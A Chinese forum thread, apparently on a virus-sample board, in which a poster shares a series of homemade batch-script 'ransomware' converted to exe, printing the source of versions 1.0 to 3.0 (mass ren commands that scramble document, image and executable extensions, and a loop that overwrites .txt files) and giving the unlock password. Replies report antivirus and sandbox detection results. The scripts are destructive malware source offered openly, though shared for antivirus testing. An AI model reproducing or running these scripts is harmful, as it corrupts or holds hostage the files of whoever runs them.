写了一个系列的勒索病毒（已更新第四代无bug）

显示全部楼层 · 发表于 2020-7-7 10:36:47

本帖最后由川建国代理人于 2020-7-8 13:10 编辑

由本人及同学zjx两人共同探讨及编写了几个了一个bat，转成exe了

双击大概会使得文件夹内的所有文件的扩展名修改为txt，其他文件扩展名被修改成乱码
https://www.virustotal.com/gui/f ... af4ab28f3/detection
VT里5/58的引擎报毒
智量miss，已上报各位测试一下杀软是否报毒，如果方便的话，希望在虚拟机里试试

仅限于加密同一个文件夹内的xls，xlsx，ppt，pptx，doc，docx，bat，exe
1.0 存在无法解密的问题。
2.0已解决，但是需要逐个双击程序使得文件恢复。
3.0可以实现一键加密上述文件，一键解密。
4.0可以加密更多类型的文件并无BUG解密，保证全部加密文件在输入密钥后解密
（前三代可能会有未能完全解密的情况出现，4.0已解决，4.0加密及解密详见17楼）

解密必须需要输入密钥，强行破解可能会使文件乱码
感谢各位测试，请提出你的意见，我将认思考你的想法，并对代码进行完善

1.0加密程序

@echo
<div><div>for /f "delims=" %%i in ('dir /s /b *.txt') do echo.>%%i.txt</div><div></div><div>
</div><div>
</div><div>

复制代码

2.0加密程序

::[Bat To Exe Converter]
::
::YAwzoRdxOk+EWAnk
::fBw5plQjdG8=
::YAwzuBVtJxjWCl3EqQJhSA==
::ZR4luwNxJguZRRnTpxphf0gMHWQ=
::Yhs/ulQjdF+5
::cxAkpRVqdFKZSDk=
::cBs/ulQjdF+5
::ZR41oxFsdFKZSDk=
::eBoioBt6dFKZSDk=
::cRo6pxp7LAbNWATEpCI=
::egkzugNsPRvcWATEpCI=
::dAsiuh18IRvcCxnZtBJQ
::cRYluBh/LU+EWAnk
::YxY4rhs+aU+JeA==
::cxY6rQJ7JhzQF1fEqQJQ
::ZQ05rAF9IBncCkqN+0xwdVs0
::ZQ05rAF9IAHYFVzEqQJQ
::eg0/rx1wNQPfEVWB+kM9LVsJDGQ=
::fBEirQZwNQPfEVWB+kM9LVsJDGQ=
::cRolqwZ3JBvQF1fEqQJQ
::dhA7uBVwLU+EWDk=
::YQ03rBFzNR3SWATElA==
::dhAmsQZ3MwfNWATElA==
::ZQ0/vhVqMQ3MEVWAtB9wSA==
::Zg8zqx1/OA3MEVWAtB9wSA==
::dhA7pRFwIByZRRnk
::Zh4grVQjdCyDJGyX8VAjFDJyYD2wGUiGIrAP4/z0/9YDepmbozS5rWRTFUGypQvhbZEmO5M10xo=
::YB416Ek+ZG8=
::
::
::978f952a14a936cc963da21a135fa983
ren *.*.* *.txt

复制代码

3.0加密程序

::[Bat To Exe Converter]
::
::YAwzoRdxOk+EWAnk
::fBw5plQjdG8=
::YAwzuBVtJxjWCl3EqQJhSA==
::ZR4luwNxJguZRRnTpxphf0gMHWQ=
::Yhs/ulQjdF+5
::cxAkpRVqdFKZSDk=
::cBs/ulQjdF+5
::ZR41oxFsdFKZSDk=
::eBoioBt6dFKZSDk=
::cRo6pxp7LAbNWATEpCI=
::egkzugNsPRvcWATEpCI=
::dAsiuh18IRvcCxnZtBJQ
::cRYluBh/LU+EWAnk
::YxY4rhs+aU+JeA==
::cxY6rQJ7JhzQF1fEqQJQ
::ZQ05rAF9IBncCkqN+0xwdVs0
::ZQ05rAF9IAHYFVzEqQJQ
::eg0/rx1wNQPfEVWB+kM9LVsJDGQ=
::fBEirQZwNQPfEVWB+kM9LVsJDGQ=
::cRolqwZ3JBvQF1fEqQJQ
::dhA7uBVwLU+EWDk=
::YQ03rBFzNR3SWATElA==
::dhAmsQZ3MwfNWATElA==
::ZQ0/vhVqMQ3MEVWAtB9wSA==
::Zg8zqx1/OA3MEVWAtB9wSA==
::dhA7pRFwIByZRRnk
::Zh4grVQjdCyDJGyX8VAjFDJyYD2wGUiGIrAP4/z0/9YCSb+agCC5hG9cAVyypQvhbZEm82rNUaGyHSHMidS+MBeza28=
::YB416Ek+ZG8=
::
::
::978f952a14a936cc963da21a135fa983
ren *.docx *.pptx
ren *.doc *.ppt
ren *.jpg *.xlsx
ren *.exe *.txt
ren *.bat *.xls
ren *.xls *.jpg
ren *.xlsx *.bat

复制代码

显示全部楼层 · 发表于 2020-7-8 12:35:27

本帖最后由川建国代理人于 2020-7-8 12:38 编辑

最新版本（无BUG版勒索+解密新鲜出炉）
可加密同文件加内的pptx，docx，ppt，doc，jpg，bat，exe，xlsx，py，xls，dll，7z，vbs，zip，ios，dat，log，rar，ps1，msi，psd，pyc，png，pdf以及一定的快捷方式
已进行虚拟机多次测试！
双击bat后，桌面文件被加密，双击解密程序后，将提示输入密钥解密，输入：

73817381

即可解密，达到了勒索的目的

如图一：双击前文件均可打开，未出现乱码

如图二：双击后文件乱码，后缀被改

如图三：打开解密exe后，提示输入密码

如图四：解密后，文件即可正常打开病毒代码尚不公布

样本和解密可见本贴附件（图片下方）

显示全部楼层 · 发表于 2020-7-7 10:49:07

由解密的方法吗？

显示全部楼层 · 发表于 2020-7-7 10:58:11

BEST
Gen:Illusion.ML.Skyline.9.1010101

显示全部楼层 · 发表于 2020-7-7 11:00:22

本帖最后由狂欢... 于 2020-7-7 11:18 编辑

360＋火绒，未拦截修改图标。360提示恢复图标

显示全部楼层 · 发表于 2020-7-7 11:00:36

微步，anyrun判定无恶意，未见文件加密，可能是打开方式不对？

显示全部楼层 · 发表于 2020-7-7 11:02:54

本帖最后由川建国代理人于 2020-7-7 11:09 编辑

密码应该是73817381

我表达错了，是输入密码后可使文件乱码
密码是为了保证安全，防止手贱

显示全部楼层 · 发表于 2020-7-7 11:02:57

虚拟机双击，好像没文件被加密。

显示全部楼层 · 发表于 2020-7-7 11:10:29

本帖最后由川建国代理人于 2020-7-7 11:13 编辑

我试了一下，桌面多了一些txt

其实可以再改进一下

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
version="1.0.0.0"
processorArchitecture="X86"
name="CompanyName.ProductName.YourApp"
type="win32" />
<description></description>
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="X86"
publicKeyToken="6595b64144ccf1df"
language="*" />
</dependentAssembly>
</dependency>
</assembly>PPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD

复制代码

显示全部楼层 · 发表于 2020-7-7 12:35:58

wd kill

显示全部楼层 · 发表于 2020-7-7 13:15:04

Norton 运行
DP拦载，没有文件被加密

[病毒样本] 写了一个系列的勒索病毒（已更新第四代无bug）

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源